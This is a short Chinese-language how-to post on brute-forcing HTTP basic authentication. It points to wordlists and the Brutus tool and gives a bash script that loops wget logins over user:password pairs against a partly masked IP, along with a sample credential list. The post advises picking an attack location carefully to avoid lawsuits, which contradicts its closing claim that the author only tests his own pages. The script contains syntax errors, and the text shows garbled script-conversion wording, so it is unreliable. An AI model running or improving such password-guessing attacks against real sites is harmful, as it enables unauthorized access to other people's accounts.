暴力破解HTTP驗證

首先，你總得有像樣的字典吧。去國外網站上下wordlist吧，或者本身寫個簡單的程序來生成字典。若是不會寫程序，呵呵呵呵，那就下載字典生成程序吧 。（不過網上下的wordlist，或者用網上下的字典生成程序生成的字典，好像都很差用）

 

其次，你總得有工具來運用字典幹活吧。能夠從網上下載工具，好比大名鼎鼎的brutus。Brutus 能夠從 [url]http://www.hoobie.net/brutus/brutus-download.html[/url] 下載。運行時的界面以下：

 

固然，也能夠本身寫工具。筆者就寫了一個簡單的腳原本幹活：

#!/bin/bash
#
user_password_file=/root/wget_cracker_user_password

while read user_password ; do
 user=$(user_password#:}
 password=$(user_password%:}
 wget -q -t 2 -T 15 --http-user=$user --http-password=$password -http://219.136.x.x:8080/tool.asp
 if [ $? -eq 0 ] ; then
  echo "OK I got an password:     user: $user ; password: $password !"
        exit 0
 fi
done < $user_password_file

exit 0

-bash-3.00# cat wget_cracker_user_password
abc:adeeffaf
deff:afkafsasf
guest:affaewf
guest:guest
guest:afdasf

 

再次，你應該清楚：暴力破解不是SYN***，IP 欺騙是不可能的，你的老巢在哪裏，受害者一眼就能看出來。因此，好好選擇「狙擊地」吧。搞很差會吃官司的哦。

 

最後，本人進行HTTP驗證暴力破解，只是驗證本身保護的WEB頁面口令的強度，毫不會去給別人的網站添麻煩。切記。